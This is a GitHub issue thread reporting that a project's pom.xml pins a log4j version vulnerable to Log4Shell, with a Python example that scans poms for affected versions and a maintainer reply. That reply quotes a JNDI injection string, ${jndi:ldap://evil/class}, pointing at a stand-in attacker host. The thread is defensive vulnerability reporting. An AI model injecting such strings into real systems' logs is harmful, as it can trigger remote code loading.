
Log4shell vulnerable

Open SecMyth opened this issue 4 years ago • 1 comment

What's the expected behavior?

pom.xml is adjusted to pull the latest log4j version

What's the actual behavior?

pom.xml requires log4j v2.14.0, which is vulnerable to CVE-2021-44228 and CVE-2021-45046.

Any other detailed information about the Issue?

See https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/

Steps to reproduce the problem

  1. Inspect pom.xml for the log4j version

SecMyth avatar Dec 21 '21 14:12 SecMyth
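A check of the kind this report asks for, added here as an example and not code from the jsql-injection project: it parses a pom.xml, resolves a `${property}`-indirected log4j-core version (the usual way Maven poms declare it), and maps the result to the two CVEs the report names. The sample pom, the fix thresholds stated in the docstring and the function names are assumptions of this example, not the project's.

```python
"""Flag log4j-core versions in a Maven pom hit by CVE-2021-44228 / CVE-2021-45046
(fixed in 2.15.0 / 2.16.0; backports 2.3.1, 2.12.2, 2.12.3 treated as fixed)."""
import re
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}
BACKPORT_FIXES = {(2, 3, 1), (2, 12, 2), (2, 12, 3)}

# Constructed sample pom: the version is indirected through a property.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties><log4j.version>2.14.0</log4j.version></properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>${log4j.version}</version>
    </dependency>
  </dependencies>
</project>"""

def parse_version(text):
    """'2.14.0' -> (2, 14, 0); keeps the first three numeric components."""
    return tuple(int(p) for p in re.findall(r"\d+", text)[:3])

def affected_cves(version):
    """CVEs from the report that apply to a given log4j-core version."""
    v = parse_version(version)
    if v < (2, 0, 0) or v in BACKPORT_FIXES:
        return []  # log4j 1.x and the backport releases are out of scope
    cves = []
    if v < (2, 15, 0):
        cves.append("CVE-2021-44228")
    if v < (2, 16, 0):
        cves.append("CVE-2021-45046")
    return cves

def log4j_core_versions(pom_xml):
    """Resolved log4j-core versions in a pom, with ${property} refs expanded."""
    root = ET.fromstring(pom_xml)
    props = {p.tag.split("}")[-1]: (p.text or "").strip()
             for p in root.findall("m:properties/*", NS)}
    for dep in root.iter("{%s}dependency" % NS["m"]):
        if (dep.findtext("m:groupId", "", NS) == "org.apache.logging.log4j"
                and dep.findtext("m:artifactId", "", NS) == "log4j-core"):
            raw = dep.findtext("m:version", "", NS).strip()
            yield re.sub(r"\$\{([^}]+)\}", lambda m: props.get(m.group(1), ""), raw)

def scan(pom_xml):
    """Map each declared log4j-core version to the CVEs that apply to it."""
    return {v: affected_cves(v) for v in log4j_core_versions(pom_xml)}
```

Running `scan(SAMPLE_POM)` reports the 2.14.0 pin against both CVEs; a pom that pins 2.16.0 or later comes back clean.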

I'm following this last Log4j CVE event too. While there's no real attack surface in the present case to hijack jSQL users, I'm wondering what an exploitation would look like, maybe in logging a database name or an HTTP header that looks like ${jndi:ldap://evil/class} for a given honeypot. Thanks for the report :+1:

ron190 avatar Dec 21 '21 17:12 ron190

Fixed by dependency upgrade.

ron190 avatar Jul 22 '23 19:07 ron190